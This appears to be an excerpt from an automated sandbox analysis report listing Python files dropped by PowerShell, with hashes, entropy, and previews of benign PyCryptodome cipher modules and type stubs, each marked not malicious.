                                                                                                                                                                                                            SHA-512:228840E70CD9FAD2CB8EA202BD45931614A9E26C619ECDBC017E832B3588C85B0BBA97B762A804DB16BE3D19481B1CC17AB616FE66D46FD66DCB38B132D2994A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Any, Union, Iterable....Buffer = bytes|bytearray|memoryview....class ARC4Cipher:.. block_size: int.. key_size: int.... def __init__(self, key: Buffer, *args: Any, **kwargs: Any) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, ciphertext: Buffer) -> bytes: .......def new(key: Buffer, drop : int = ...) -> ARC4Cipher: .......block_size: int..key_size: Iterable[int]..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6123
                                                                                                                                                                                                            Entropy (8bit):4.915681807073174
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:doFQHvofgiwZAEuVDYsgiiJsJWkGI9gmJt4qeA//RFWotKj:deQHvogySniiSYkGIOmJt4A/RYotKj
                                                                                                                                                                                                            MD5:C34B138E93044278085C0172B171945A
                                                                                                                                                                                                            SHA1:058CCA453B61AD12F6007A84E1626371EA2E5855
                                                                                                                                                                                                            SHA-256:9E71714F41AD4FC6499B83FF0199D1FF75D73D551A740CFFDC077D13AD930EDF
                                                                                                                                                                                                            SHA-512:39CA5D7161933F6AB86D14877E8E089D3BD11561494079B99C7B56209B074FAE50D31A8BA25760C3309E36BBB216A818ED49084E9479F0B47FEFC4F55BF2EC51
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/Blowfish.py : Blowfish..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===========================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1056
                                                                                                                                                                                                            Entropy (8bit):4.93319559592513
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+7vEStrF+olDNqDNMN3zb1DoeRHYO:K+1+O+O+s+8+s+w+DtrF+wJqJejbFoev
                                                                                                                                                                                                            MD5:ADC4E67BDA4767C9F270DD32CCECC085
                                                                                                                                                                                                            SHA1:69FE8AABD602E03066EE627CFD0185486383A618
                                                                                                                                                                                                            SHA-256:C108D97BABEE0989438F29A01B0B0B95AE54118434A49AE832FD0EB2310FB73F
                                                                                                                                                                                                            SHA-512:C613BA321D3F8D0C41BE9DE652A47839C2059F9BF53F1FAA9E5967193D1898EAFF394857D6EAB4E0AA24E2159733BC304AACE3A94DBF6CD2B200EBA8712477D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....BlowfishMode = int....MODE_ECB: BlowfishMode..MODE_CBC: BlowfishMode..MODE_CFB: BlowfishMode..MODE_OFB: BlowfishMode..MODE_CTR: BlowfishMode..MODE_OPENPGP: BlowfishMode..MODE_EAX: BlowfishMode....def new(key: Buffer,.. mode: BlowfishMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgp
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6230
                                                                                                                                                                                                            Entropy (8bit):4.846211484152016
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:d2QHvVgdaKSnrF4xkOUBRkUtmz5t4AyRYotKw:UeVgd8n549aW75t4rYotKw
                                                                                                                                                                                                            MD5:1166B892369E19B4220BBC069D9CCABC
                                                                                                                                                                                                            SHA1:F8FFFEFAD392A8D7F79CD644B4D21D771D7458EF
                                                                                                                                                                                                            SHA-256:2E59E547BAF132E8553FC76E9AE2151B48C0610483E54130B0B6262A03F95903
                                                                                                                                                                                                            SHA-512:B99AA9B0F448B24BCF56DEB0BB30B948C1FBAE91692A78A291AE30A1935E4C74204A24925573E3E60777B5033CF748FD7C0D4BEE3E79BCF3D8D5FBBB19E195CE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/CAST.py : CAST..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1021
                                                                                                                                                                                                            Entropy (8bit):4.948780176242253
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+TivieL/tixsDOIosswDNqDNMN3zb1DoeZ:K+1+O+O+s+8+s+w+TQieL/tixsDOIYwr
                                                                                                                                                                                                            MD5:DF4E506EF652F92CD4F1C01C3E91C3E0
                                                                                                                                                                                                            SHA1:49625B957B302755062BFEF1FD00A1C88F378C79
                                                                                                                                                                                                            SHA-256:A017C351D0BF5AEFC610A60EE41B968BC5C1FA5E78B9FA593FE3C9C278CE9550
                                                                                                                                                                                                            SHA-512:9B85DFA5B47C60337AEE04D48AF64FE2B5F03152498DE4C340B0A4C170262D0C5BE8549787AA0093592E2308A41AE88A725E8C2D6B340E3B6EB8B2803C0328D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....CASTMode = int....MODE_ECB: CASTMode..MODE_CBC: CASTMode..MODE_CFB: CASTMode..MODE_OFB: CASTMode..MODE_CTR: CASTMode..MODE_OPENPGP: CASTMode..MODE_EAX: CASTMode....def new(key: Buffer,.. mode: CASTMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_s
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11023
                                                                                                                                                                                                            Entropy (8bit):4.6255670465451315
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:9qrskrs9t3q/IcwYkUlRGziNzvPppkzBjfgEcTUjwzgLMZKPOYbCCtrBUpt:0rskrs9VqxwwlCihP8xfgZF6PPOqBUt
                                                                                                                                                                                                            MD5:7BAFD5D12D4086033A33111C77432273
                                                                                                                                                                                                            SHA1:3EC235810D8A590B23B1477BD37D4C897B08D7BC
                                                                                                                                                                                                            SHA-256:3D8F607DAED2F2C1E419E044E996FD835FA8687CE25D30DDE13F63971937F0D3
                                                                                                                                                                                                            SHA-512:E8543F1504C5E6B6A4D17B073F769830545E9A2085892AD5236DB2EFE07B80127577E8FAB29D1EDABCA4533EAD9DA5378C01B18B5FBF6F9C99DDF83F5E6E0CB5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):798
                                                                                                                                                                                                            Entropy (8bit):4.852768717173627
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RE2AIM/sxQUADnRNne3yFnR3Fne3xodgxVYBy:3Me/4vesLehx+w
                                                                                                                                                                                                            MD5:7311A085F06CFB4AF892363A4CB21E0E
                                                                                                                                                                                                            SHA1:5DF2EEAE8BFD1978BE23CCDD2ECD712CFB79D6B1
                                                                                                                                                                                                            SHA-256:CE31A7182E4369DC8F65D929813CE67E7AFA67ECEED9821B124BBEAB13D9E668
                                                                                                                                                                                                            SHA-512:B6332CFB639FCF28701DF645276F21EA8535E6B401FDB6162E0F397B74FDBF47CECC10EE8B400278F268EBDAA1FF4C5A824BA408A03BE9A9CB9ADC167F61CA87
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, overload, Optional....Buffer = bytes|bytearray|memoryview....def _HChaCha20(key: Buffer, nonce: Buffer) -> bytearray: .......class ChaCha20Cipher:.. block_size: int.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def seek(self, position: int) -> None: .......def new(key: Buffer, nonce: Optional[Buffer] = ...) -> ChaCha20Cipher: .......block_size: int..key_size: int..
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11855
                                                                                                                                                                                                            Entropy (8bit):4.952327887703867
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:0qrskrs9t3q/IIJOqi/JHxbkg9XRV8psd6agIbjKVFtt:zrskrs9VqVi/j7XRViWPKVHt
                                                                                                                                                                                                            MD5:FB82FBA68F1745F08771CA59A1A1DB89
                                                                                                                                                                                                            SHA1:2D84988AA839AB296667A08E947146AA08F34D31
                                                                                                                                                                                                            SHA-256:51A6580A63C4487BCD0DF401999A5C4497416CF251E2E935C950DC2A59422271
                                                                                                                                                                                                            SHA-512:34EF9DEE60458FD7FF62A92E1FDE86A08D3B92CF0F84DAFF849D9288F49BD1A1DF032C52BE188B8EAB7B1E1BDCBC5257EF8AC42396E7D64FFFFDEDACAD61F2AA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# ===================================================================..#..# Copyright (c) 2018, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1107
                                                                                                                                                                                                            Entropy (8bit):4.862920256864568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RElsAIfUA0nRNne3yFnR3Fne3TP/Wwn90nf5GodLVYBy:tfUJvesLeiwanoo+w
                                                                                                                                                                                                            MD5:DED98A1B5B497FB5816021E8B6E5F6F4
                                                                                                                                                                                                            SHA1:977F227DD05557AEDD8C40E653D74AEAF3734A43
                                                                                                                                                                                                            SHA-256:6D880A3628C47D9BCE851019C82720D570F44699E1B453AF432AE4A7B20A1273
                                                                                                                                                                                                            SHA-512:C6494CE19133C645285D7ACA56AD2F0D9E978ED2C4C7BB58A9C90B095A360DA3881E0D6F308F3B01508A331CCBF070690543BAC826FF47E8F9153949D92D9EF4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Tuple, overload, Optional....Buffer = bytes|bytearray|memoryview....class ChaCha20Poly1305Cipher:.. nonce: bytes.... def __init__(self, key: Buffer, nonce: Buffer) -> None: ..... def update(self, data: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, received_mac_tag: str) -> None: ..... def encrypt_and_digest(self, plaintext: Buffer) -> Tuple[bytes, bytes]: ..... def decrypt_and_verify(self, ciphertext: Buffer, received_mac_tag: Buffer) -> bytes: .......def new(key
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6105
                                                                                                                                                                                                            Entropy (8bit):4.865470874769693
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dOFQHvotgiwHCXjG6DH5K0kmIbU6Ct4qeAYZRFWotK0:dcQHv2gUqC5K0kmIct4NZRYotK0
                                                                                                                                                                                                            MD5:1B182D8CD016EDC5F53015A433BE05D5
                                                                                                                                                                                                            SHA1:531C8DB19CDA7EDEE5B45B83D0C309F4EA65C1D5
                                                                                                                                                                                                            SHA-256:BAE52D7A7D2CD509D466156DC2878D7E4194BB304A8CB555F353EC00108C9186
                                                                                                                                                                                                            SHA-512:3D08AF59AA18156E5086E061BBDDD3E7E321A5EB98B1EFE4CCE56D7CA668CDFD167ECEF8F42A66FB6450797F21A6A21841FE24A606B0F1F959375CA6F4279227
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES.py : DES..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# =====================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1001
                                                                                                                                                                                                            Entropy (8bit):4.909258900429456
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RENAAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+Aiv7Hoc6iTD3IouwDNqDNMN3zb1DoeRHT:K+1+O+O+s+8+s+w+H7XY6JqJejbFoeRz
                                                                                                                                                                                                            MD5:1EA64CB2FDD42F20112DF249B9A7CB87
                                                                                                                                                                                                            SHA1:633110F4D03C3EDF415640989802108EC2764422
                                                                                                                                                                                                            SHA-256:98BBDA18A15E4757AB66CC049EADA7FE944FF2D1093EE70F643D634CAF296E7E
                                                                                                                                                                                                            SHA-512:2845EBEC10C8250A0B4C7D0AB87245CF91D07D0F0973B0289516F94494D5698E17A9709D1B411B04908F02FC83B0922F0AEDEADF7901106184EA247729DAADF8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Dict, Iterable, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....DESMode = int....MODE_ECB: DESMode..MODE_CBC: DESMode..MODE_CFB: DESMode..MODE_OFB: DESMode..MODE_CTR: DESMode..MODE_OPENPGP: DESMode..MODE_EAX: DESMode....def new(key: Buffer,.. mode: DESMode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, CtrMode, OpenPgpMode]: .......block_size: int..key_size: int.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7112
                                                                                                                                                                                                            Entropy (8bit):4.8687640980714715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dKQHvCgthz1GPoiRxwKIUK9t4A1zRYotKa:YeCgHAhRn9K9t42NYotKa
                                                                                                                                                                                                            MD5:44204A7CBBF99E82EB31B7F746B43AB3
                                                                                                                                                                                                            SHA1:4589336CF1A1D1E74DAAA10E87C898DD804DB7F8
                                                                                                                                                                                                            SHA-256:70D9B525599D85146924EF8DBDF0980C42A03F4FBB2D01A2CADBF7ED2D43CD93
                                                                                                                                                                                                            SHA-512:1D0403F3BCDF6AE8A7A7D2FE339112B7BE604EA1D103388547760FF73CBBC7DF5106CF6D702A6134CC4C51A836FEB3ED42AC0BFDE90A46E67F684ECCA3DDF4F6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/DES3.py : DES3..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ===================================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1073
                                                                                                                                                                                                            Entropy (8bit):4.981416466224206
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1RENbKAI1+WJ+YzJ+YVJ+EJ+YpJ+ylJ+4NINSfWvOkDoEDNqDNMN3zb1DoeRHYX:KI1+O+O+s+8+s+w+4GxOkDRJqJejbFo7
                                                                                                                                                                                                            MD5:4E6C49F8750DD064B28D3138434CC5F3
                                                                                                                                                                                                            SHA1:121984851A159ED24D11E4E79DF4B0B4BCF6AE63
                                                                                                                                                                                                            SHA-256:9005CB3F60F682B7840F7112D940128AE8EA1777DAC8C1F3A4B8F0E17F6A398B
                                                                                                                                                                                                            SHA-512:E21FC0A0B2D2CCD167CC2B9B0B9DE66771B11AF4CF2D9510F53E029D1CC43407A03B2866C000E6E31975C73B9457BB3CB99317E8FC51D276B84C93E9CC6CBEB3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:from typing import Union, Dict, Tuple, Optional....Buffer = bytes|bytearray|memoryview....from Crypto.Cipher._mode_ecb import EcbMode..from Crypto.Cipher._mode_cbc import CbcMode..from Crypto.Cipher._mode_cfb import CfbMode..from Crypto.Cipher._mode_ofb import OfbMode..from Crypto.Cipher._mode_ctr import CtrMode..from Crypto.Cipher._mode_openpgp import OpenPgpMode..from Crypto.Cipher._mode_eax import EaxMode....def adjust_key_parity(key_in: bytes) -> bytes: .......DES3Mode = int....MODE_ECB: DES3Mode..MODE_CBC: DES3Mode..MODE_CFB: DES3Mode..MODE_OFB: DES3Mode..MODE_CTR: DES3Mode..MODE_OPENPGP: DES3Mode..MODE_EAX: DES3Mode....def new(key: Buffer,.. mode: DES3Mode,.. iv : Optional[Buffer] = ...,.. IV : Optional[Buffer] = ...,.. nonce : Optional[Buffer] = ...,.. segment_size : int = ...,.. mac_len : int = ...,.. initial_value : Union[int, Buffer] = ...,.. counter : Dict = ...) -> \.. Union[EcbMode, CbcMode, CfbMode, OfbMode, C
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8783
                                                                                                                                                                                                            Entropy (8bit):4.798422325497298
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:dEFQHvo7wHQeYz8L34mghqko9uN8I3y5xU3a5tLfZCMKesDBkFBIMd3T20kqk9ku:d6QHv13GFA4IywxoXKUF9ku
                                                                                                                                                                                                            MD5:1451B65F3E7EC1B91C1D496EAAA705D0
                                                                                                                                                                                                            SHA1:D695CB12CEE4E321748CA8E4DEBBC82945628769
                                                                                                                                                                                                            SHA-256:D924170C92BE9E1324DEDC5B731F92513CDF759A251148DF8ECF1A0E6011D77C
                                                                                                                                                                                                            SHA-512:5D002279E789E867E643F97B91C65C45DA561171D0CFCF6EC3A3CBB35BBD3B44923EC5249D89E788D637CF8F7D9617808C2CEE806775E49FB5E9D14B3B6A1BED
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:# -*- coding: utf-8 -*-..#..# Cipher/PKCS1_OAEP.py : PKCS#1 OAEP..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..# SOFTWARE...# ======================
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1214
                                                                                                                                                                                                            Entropy (8bit):4.8233945885346685
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1REjQFC19+1bs1zrhqMS8KDLYOT3OMIAl2HH8Myje+RGoziVEpvNtMEHo:gQFy+1o1IttDLteMI5aoJupVjHo
                                                                                                                                                                                                            MD5:A065FCD801FD38FDC5457C65A8B94801
                                                                                                                                                                                                            SHA1:7C353866EA0CFC0E55A90530714758115424B723
                                                                                                                                                                                                            SHA-256:DFEAE2746DEFD28744873401D008462C4C1EF4899B7BAFAEAE14FCA12A5BB73E
                                                                                                                                                                                                            SHA-512:959C65295EA6C93D67E7C1E5361A03C09CB7A37C7C64A92334A0C612952C3609708766780C99BD93DD5A9C23D79B7A3CF0C0614D083A13F3F9A8D5DBC3E6C7A2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
